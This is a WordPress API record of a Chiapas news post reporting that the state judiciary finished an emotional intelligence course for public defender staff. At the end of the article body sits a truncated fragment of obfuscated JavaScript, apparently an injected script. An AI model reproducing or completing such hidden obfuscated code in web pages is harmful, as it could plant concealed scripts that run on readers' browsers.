{"id":21829,"date":"2025-05-10T04:16:13","date_gmt":"2025-05-10T04:16:13","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21829"},"modified":"2025-05-10T04:16:14","modified_gmt":"2025-05-10T04:16:14","slug":"concluye-curso-sobre-inteligencia-emocional-impartido-por-el-poder-judicial-del-estado-de-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21829","title":{"rendered":"Concluye curso sobre inteligencia emocional impartido por el Poder Judicial del Estado de Chiapas"},"content":{"rendered":"\n<p>-Participan servidoras y servidores del Instituto de la Defensor\u00eda P\u00fablica del Estado.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"21830\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0018-1024x682.jpg\" alt=\"\" class=\"wp-image-21830\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0018-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0018-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0018-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0018-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0018-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0018.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"21832\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0017-1024x682.jpg\" alt=\"\" class=\"wp-image-21832\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0017-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0017-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0017-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0017-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0017-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0017.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"21831\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0016-1024x682.jpg\" alt=\"\" class=\"wp-image-21831\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0016-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0016-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0016-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0016-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250509-WA0016.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>9 de mayo del 2025. El Poder Judicial del Estado de Chiapas, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, concluy\u00f3 el curso-taller \u201cInteligencia Emocional\u201d, dirigido a servidoras y servidores p\u00fablicos del Instituto de la Defensor\u00eda P\u00fablica del Estado.<\/p>\n\n\n\n<p>Durante tres d\u00edas, las y los participantes adquirieron conocimientos, t\u00e9cnicas y herramientas pr\u00e1cticas que fortalecen la sensibilizaci\u00f3n, la introspecci\u00f3n y el manejo adecuado de las emociones, con el objetivo de mejorar la atenci\u00f3n a personas usuarias del sistema de justicia, as\u00ed como la calidad de la comunicaci\u00f3n y las relaciones laborales al interior de la instituci\u00f3n.<\/p>\n\n\n\n<p>El curso fue impartido por el psic\u00f3logo adscrito al Juzgado de Control y Tribunal de Enjuiciamiento de Cintalapa, Julio C\u00e9sar Bravo Figueroa, quien abord\u00f3 diversas estrategias para fomentar un entorno laboral m\u00e1s emp\u00e1tico, colaborativo y profesional.<\/p>\n\n\n\n<p>Con estas acciones, el Poder Judicial del Estado reafirma su compromiso con la capacitaci\u00f3n continua y el desarrollo integral de su personal, en favor de una justicia m\u00e1s humanista y accesible.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>-Participan servidoras y servidores del Instituto de la Defensor\u00eda P\u00fablica del Estado. 9 de mayo del 2025. El Poder Judicial del Estado de Chiapas, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, concluy\u00f3 el curso-taller \u201cInteligencia Emocional\u201d, dirigido a servidoras y servidores p\u00fablicos del Instituto de la Defensor\u00eda P\u00fablica del Estado. Durante tres &hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-21829","post","type-post","status-publish","format-standard","","category-sin-categoria"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21829","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21829"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21829\/revisions"}],"predecessor-version":[{"id":21833,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21829\/revisions\/21833"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21829"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21829"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21829"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}